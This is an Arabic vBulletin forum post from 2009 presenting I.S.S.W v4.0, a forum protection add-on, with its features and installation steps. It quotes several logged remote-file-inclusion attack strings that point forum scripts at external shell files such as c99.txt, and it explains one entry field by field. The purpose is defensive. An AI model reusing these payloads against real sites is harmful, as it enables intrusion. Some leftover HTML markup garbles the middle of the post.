الحماية الكاملة I.S.S.W v4.0 حاصل على أفضل هاك في موقع ترادينيت

من طرف **Admin** السبت يوليو 11, 2009 4:50 am

السلام عليكم ورحمة الله وبركاته

هاك الحماية الكاملة I.S.S.W v4.0 حاصل على أفضل هاك في موقع ترادينيت

برمجة الفريق الأمني العربي بأيادي فراتية

اسم المنتج : حماية المنتدي i.s.s.w
الإصدار : i.s.s.w v 4.0
المبرمجين : الفريق الامني
جديد الاصدار :
1:قراءة ملف اللوق لمحاولات الاختراق من لوحت التحكم
2: امكانية التحكم في الصفحة التي تعرض للمخترق
3: اضافه لوحت تحكم مختصره cp vb
4: اضافة اخبار عن ثغرات المنتديات في لوحت التحكم كأختصار
5 : تنبية في التحديث
6: تعديلات في عمل الهاك وتحديثة

الحماية الكاملة I.S.S.W v4.0 حاصل على أفضل هاك في موقع ترادينيت 1932.imgcache

عمل الهاك : حماية المنتدى بشكل كامل بعون الله

الحماية الكاملة I.S.S.W v4.0 حاصل على أفضل هاك في موقع ترادينيت 1933.imgcache

الحماية الكاملة I.S.S.W v4.0 حاصل على أفضل هاك في موقع ترادينيت 1934.imgcache

الحماية الكاملة I.S.S.W v4.0 حاصل على أفضل هاك في موقع ترادينيت 1935.imgcache

الخيار الاول : لتشغيل حمايه المنتدي
منع استغلال xss في المنتدي والحمد لله تم تجربة بشكل ناجح
منع حقن التمبلتات اي اختراق الفورم هوم بنسبة 90%
حجب عدة مواقع تساعد على العبث في المنتديات
تطوير للدوال القديمة للتوافق معه السيرفر
منع اكثر اوامر اليونكس وحيل الحقن في الشيل
اظهار المواقع المصابة على سيرفرك ومحاولت استغلالها للدخول على موقعك :1 (79):
الخيار الثاني :
منع اكواد التحويل لاخر عشر مواضيع
والاهداءات والاحصائيات ومسح HTml الخبيث من عنواين الموضوع

الان نأتي للقسم الاكثر اثارة للموضوع
عند دخولك مجلد sec
افتح الملف logfile_hacker.txt
ستجد اذا تعرض السيرفر او موقعك لعملية اختراق اما بالشيل او اداة سوف يتم تخزينها بالتفصيل

كود PHP:

2007-12-11, 05:50:44, 1197370244, 209.67.223.188, p=11575//codebb/lang_select?phpbb_root_path=http://5thw.lchost.co.uk/site/administrator/components/com_jreactions/safe.txt?, libwww-perl/5.808

كود PHP:

[center]2007-12-11, 06:32:22, 1197372742, 203.211.135.147, t=2081//zipndownload.php?pp_path=http://www.cartographia.org/administrator/remote.txt?, libwww-perl/5.808
2007-12-11, 07:09:46, 1197374986, 211.157.108.187, p=11575//codebb/pass_code.php?phpbb_root_path=http://www.mta.cl/galeria2/galery.txt?, libwww-perl/5.79
2007-12-11, 09:15:08, 1197382508, 200.102.138.66, t=http://firehash-filez.110mb.com/c99.txt?, Mozilla/3.0 (compatible; Indy Library)
[/center]

كود PHP:

[center]2007-12-11, 05:50:44,<div align="center">الان هذول ثلاث شيلات سنشرح بالتفصيل احد الاسطر
<div align="center">طبعا الفاصلة تفصل بين كل معلومه ومعلومة
<div style="margin:20px; margin-top:5px">

<div class="smallfont" style="margin-bottom:2px">كود PHP:</div>

<div class="alt2" dir="ltr" style="

margin: 0px;

padding: 3px;

border: 1px inset;

width: 640px;

height: 34px;

text-align: left;

overflow: auto">

<code style="white-space:nowrap">

<b><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">, 
</span><span style="color: #0000BB"></span>
</span>
</code></b>

</code>

</div>

</div>التاريخ والوقت </div></div>

عدد المحاولات
كود PHP:

1197370244

ايبي الموقع المصااب
كود PHP:

209.67.223.188

الاصابة طبعا تشفرت لاغراض امنيه
كود PHP:

p=11575//codebb/lang_select

الاستغلال
كود PHP:

?phpbb_root_path=http://5thw.lchost.co.uk/site/administrator/components/com_jreactions/safe.txt?

نوع الاداه او اصدارها بما انو شيل راح يطلع السطر المستخدم اما اذا كان برنامج
يجيب اسمه بعد يعني من وين صدر الامر اذا من متصفح يطلع اسمه
كود PHP:

libwww-perl/5.808

الان شرح التركيب
امسح جميع هاكات لها علاقه في الحمايه او منع xss
اما من ركب هاك الحمايه issw v3
عليه فقط حذف ملف البرودكت
وتركيب المحدث

شرح حذف الهاك

من لوحت تحكم المنتدي === التحكم بالمنتجات product === من جانب المراد حذفة نختار الغاء التثبيت
ومن ثم حذف توابعه
---------------------------------------------------------------------------
التركيب
لمهم ناتي الى طريقة التثبيت نرفع ما بداخل
upload
ارفع المجلد sec
الى مجلد المنتدي الرئيسي
اعطي التصريح 666 counter.txt logfile_hacker.txt
وارفع cpnav_issw
داخل
vb\includes\xml
قوم باستدعاء البروديكت من لوحت تحكم المنتدي
واتمنى لكم النجاح في التنصيب
ملاحظة الهاك يتعارض مع اي هاك حمايه او من هالامور
مع
تحيات الفريق الامني
الان من لوحت تحكم المنتدي قم برفع البرودكت

تم تجربت المنتج على الاصدار
3.6.x
3.7.0

لمن لديه اقتراح او تطوير او استفسار او وجد خلل في البرودكت
يطرحه في الفريق الأمني www.is-sw.net لنصل لتطوير اكثر

وجل من لا يخطأ وشكرا لكم

لتتبع جديد الهاك على الرابط التالي
http://www.is-sw.net/index.php?issw=isswvb

برمجة الأخ shap7_haCker
[/center]

الإثنين	الثلاثاء	الأربعاء	الخميس	الجمعة	السبت	الأحد
				1	2	3
4	5	6	7	8	9	10
11	12	13	14	15	16	17
18	19	20	21	22	23	24
25	26	27	28	29	30